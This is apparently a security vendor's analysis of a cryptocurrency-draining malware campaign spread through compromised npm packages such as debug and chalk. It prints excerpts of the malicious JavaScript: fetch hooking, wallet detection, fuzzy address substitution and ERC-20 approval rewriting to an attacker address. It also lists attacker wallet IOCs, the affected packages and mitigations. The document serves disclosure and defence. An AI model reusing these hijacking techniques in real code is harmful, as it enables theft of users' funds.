The NPM ecosystem recently experienced yet another large-scale supply chain incident, in which 27 widely used packages—including popular libraries such as debug and chalk—were compromised with advanced malware designed as a cryptocurrency drainer. This breach, which involved packages downloaded more than 2 billion times per week, highlights how cybercriminals exploit trusted software distribution channels to deliver sophisticated Web3 wallet–hijacking code.
The report provides an in-depth examination of how the malicious payload functions, its method of spreading through npm packages, and the indicators of compromise (IOCs) tied to this attack.
NPM supply chain compromise
The intrusion originated with a carefully orchestrated phishing campaign aimed at package maintainers. Adversaries sent fraudulent emails from “support@npmjs.help”—a ”domain registered only three days before the operation—which enabled them to obtain maintainer credentials. With those credentials, they injected malicious code into 27 popular npm packages, among them:
- debug—a well-known debugging utility
- chalk—a library for styling terminal strings
- Several other packages downloaded millions of times each week
The altered packages contained a payload crafted to specifically target Web3 applications and cryptocurrency-related operations. This case demonstrates how even trusted development dependencies can be turned into vectors for financial malware propagation.
Web3 wallet attack surface
Browser-based cryptocurrency wallets such as MetaMask, Trust Wallet, and similar tools have become essential for interacting with decentralized applications (DApps). When compromised npm packages are installed unknowingly, the malicious code runs within the same JavaScript execution context as these wallets, making it possible to launch sophisticated transaction-manipulation attacks. The fact that both npm-delivered code and Web3 wallets operate in the browser environment creates an ideal setting for this type of supply chain compromise.
Malware analysis
The cryptocurrency-draining malware examined exhibits a sophisticated understanding of blockchain protocols and wallet interactions. Engineered to run covertly, the malicious program intercepts communications from wallets and reroutes cryptocurrency transactions to addresses controlled by the attackers across multiple blockchain ecosystems.
Initial obfuscation techniques
The original malicious code makes extensive use of obfuscation to avoid detection. Identifiers for variables have been replaced with hexadecimal-style names such as _0x124ed3 and _0xba16ef, and function identifiers are similarly concealed. The payload also employs a complex object layout to hold hundreds of cryptocurrency addresses, which substantially complicates static code analysis.
var _0xba16ef = {
'zprkq': function (_0x23e86b, _0x5b593c) {
return _0x23e86b + _0x5b593c;
},
'OiGzk': "1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx",
'FlhWy': "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976"
// ... hundreds more obfuscated properties
};Figure 1. Obfuscated variable structure that stores attacker-controlled addresses
Multi-stage attack chain
After a compromised npm package is installed and executed—whether in a development workstation or a production environment—the malware proceeds through a series of coordinated stages designed to persist and maximize opportunities to steal cryptocurrency.
Stage 1: NPM package execution and environment detection
The malicious code runs as part of the legitimate package’s installation or runtime. It then probes the environment to detect the presence of Web3 wallets and begins initializing its payload.
Stage 2: Web3 wallet detection and initialization
The malware attempts to identify Web3 wallet instances in the browser context. It specifically checks for window.ethereum objects, which indicate MetaMask or other Ethereum-compatible wallet providers, and proceeds with initialization if such interfaces are present.
async function checkethereumw() {
try {
const accounts = await window.ethereum.request({
'method': "eth_accounts"
});
if (accounts.length > 0) {
runmask(); // Initialize wallet hijacking
}
} catch (error) {
// Fallback initialization
}
}Figure 2. Mechanism for detecting Web3 wallets in the browser environment
Stage 3: Network traffic interception
Once active, the malware hooks into both the fetch API and XMLHttpRequest to intercept outgoing and incoming network traffic. This interception enables modification of API responses that include cryptocurrency addresses before those responses are handled by the victim application.
// Hook fetch API
fetch = async function (...args) {
const response = await fetch(...args);
const modifiedData = replaceAddressesInContent(data);
return new Response(modifiedData, {
'status': response.status,
'headers': response.headers
});
};Figure 3. Network interception workflow (hooks into fetch and XMLHttpRequest)
Stage 4: Advanced address replacement using fuzzy matching
A particularly sophisticated component of the payload is its use of the Levenshtein distance algorithm for fuzzy string matching. Rather than performing blunt string replacements, the malware searches for the attacker address that is the “closest” match to any legitimate address it encounters, making substituted values less conspicuous to users.
function calculateEditDistance(str1, str2) {
// Levenshtein distance implementation
const matrix = Array.from({
'length': str1.length + 1
}, () => Array(str2.length + 1).fill(0));
// ... distance calculation logic
}Figure 4. Fuzzy-matching (Levenshtein) algorithm used to select attacker addresses for replacement
Stage 5: Transaction hijacking and manipulation
The final—and most critical—phase involves intercepting wallet transaction routines and altering them to favor the attacker. The malware targets several core Ethereum functions:
ERC-20 Token Approval Manipulation:
- Intercepts approve() calls (0x095ea7b3) and assigns an unlimited allowance to the attacker address.
- Replaces the intended recipient address with the attacker’s address.
- Sets the approval amount to the maximum possible value (all f characters in hexadecimal).
Transaction Redirection:
- Intercepts transfer() calls (0xa9059cbb) to redirect funds.
- Modifies transferFrom() calls (0x23b872dd) to exfiltrate tokens.
- Manipulates permit functions (0xd505accf) to enable gasless approvals.
if (data.startsWith("0x095ea7b3")) {
const functionSig = data.substring(0, 10);
const attackerAddress = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976";
const unlimitedAmount = 'f'.repeat(64);
modified.data = functionSig + attackerAddress + unlimitedAmount;
}Figure 5. ERC-20 approval manipulation logic
Cross-chain support
The malware reflects broad technical capability by supporting multiple blockchain networks:
- Ethereum: ERC-20 tokens and ETH transfers
- Bitcoin: Legacy and SegWit address formats
- Solana: SPL token transactions
- TRON: TRX and TRC-20 tokens
- Litecoin: multiple address formats
- Bitcoin Cash: CashAddr format
Each blockchain uses distinct address patterns and transaction schemas, so the payload implements specialized handling logic for every supported network.
Stealth and persistence mechanisms
To remain undetected, the malware employs several tactics:
- Method Hooking: preserves original references to functions and can restore them when necessary.
- Gradual Deployment: uses retry logic with delays to reduce the chance of detection.
- Error Handling: includes graceful fallbacks so the host application does not crash.
- Debug Interface: contains a hidden control interface to monitor interception success.
window.stealthProxyControl = {
'isActive': () => isActive,
'getInterceptCount': () => interceptionCount,
'forceShield': () => hookWalletProvider(window.ethereum)
};Figure 6. Hidden debug/control interface for monitoring and managing interception
Key indicators of compromise (IOCs)
Primary attacker addresses:
Ethereum:
- 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976 (Primary)
- 0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024
- 0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B
Bitcoin Legacy:
- 1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx
- 1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd
Bitcoin SegWit:
- bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm
- bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9
Solana:
- 5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6
- 98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ
Impact and real-world implications
This npm supply chain compromise introduces unprecedented risks to the cryptocurrency ecosystem:
- Massive Scale: with over 2 billion weekly downloads, the pool of potential victims is enormous.
- Supply Chain Trust: the compromise of trusted development dependencies undermines basic security assumptions.
- Financial Losses: direct theft of cryptocurrencies and tokens across multiple blockchain networks.
- Compromised DeFi Interactions: unlimited token approvals can lead to subsequent drainage of funds.
- Cross-Chain Impact: simultaneous attacks spanning multiple blockchains.
- Developer Targeting: the campaign expressly targets developers, who are often early adopters of Web3 technologies.
- Stealth Operations: the difficulty of detection allows prolonged compromise in both development and production environments.
The combination of distribution via the software supply chain and fuzzy address matching renders this attack particularly hazardous, because both the delivery mechanism and the payload appear legitimate, greatly lowering the chance of discovery.
Conclusion
The analyzed, highly sophisticated cryptocurrency drainer illustrates the shifting threat landscape faced by Web3 users. Through a mix of advanced obfuscation, cross-chain functionality, and intelligent address-replacement techniques, the malware represents a notable escalation in cryptocurrency theft capability.
This incident emphasizes the vital importance of Web3 security awareness and the implementation of robust protective measures when interacting with cryptocurrency applications. As decentralized finance expands, more complex attacks aimed at wallet infrastructure and user interactions should be expected.
Mitigation recommendations
To guard against comparable supply chain incidents and cryptocurrency theft, developers and organizations should implement the following:
Supply Chain Security:
- Dependency Auditing: perform regular audits of npm dependencies.
- Package Lock Files: use package-lock.json to enforce consistent dependency versions.
- Trusted Sources: verify package publishers and avoid packages with suspicious changes in ownership.
- Dependency Monitoring: deploy monitoring for unexpected package updates or alterations.
- Private Registries: consider private npm registries for mission-critical applications.
Detection and Response:
- Network Monitoring: monitor for anomalous network activity and API modifications.
- Behavioral Analysis: implement detection for unusual wallet interaction patterns.
- Security Scanning: use scanners such as Mend.io to identify malicious package installations.
As supply chain attacks grow more sophisticated and cryptocurrency adoption continues to rise, proactive security controls are essential. Given the sheer scale of the npm ecosystem and the financial incentives in Web3, this attack vector will remain attractive to cybercriminals, demanding heightened vigilance from the developer community.
Affected packages
| Package | Version | MSC |
| backslash | 0.2.1 | MSC-2025-7955 |
| chalk-template | 1.1.1 | MSC-2025-7876 |
| supports-hyperlinks | 4.1.1 | MSC-2025-7872 |
| has-ansi | 6.0.1 | MSC-2025-7873 |
| simple-swizzle | 0.2.3 | MSC-2025-7886 |
| color-string | 2.1.1 | MSC-2025-7875 |
| error-ex | 1.3.3 | MSC-2025-7881 |
| color-name | 2.0.1 | MSC-2025-7882 |
| is-arrayish | 0.3.3 | MSC-2025-7953 |
| slice-ansi | 7.1.1 | MSC-2025-7874 |
| color-convert | 3.1.1 | MSC-2025-7954 |
| wrap-ansi | 9.0.1 | MSC-2025-7877 |
| ansi-regex | 6.2.1 | MSC-2025-7880 |
| supports-color | 10.2.1 | MSC-2025-7879 |
| strip-ansi | 7.1.1 | MSC-2025-7878 |
| chalk | 5.6.1 | MSC-2025-7884 |
| debug | 4.4.2 | MSC-2025-7887 |
| ansi-styles | 6.2.2 | MSC-2025-7871 |
| proto-tinker-wc | 0.1.87 | MSC-2025-7883 |
| Prebid-universal-creative | 1.17.3 | MSC-2025-7890 |
| duckdb | 1.3.3 | MSC-2025-7949 |
| @duckdb/node-api | 1.3.3 | MSC-2025-7888 |
| @duckdb/node-bindings | 1.3.3 | MSC-2025-7889 |
| @duckdb/duckdb-wasm | 1.29.2 | MSC-2025-7930 |
| prebid.js | 10.9.2 | MSC-2025-7950 |
| Prebid | 10.9.1,10.9.2 | MSC-2025-7951 MSC-2025-7952 |
| @coveops/abi | 2.0.1 | MSC-2025-7948 |
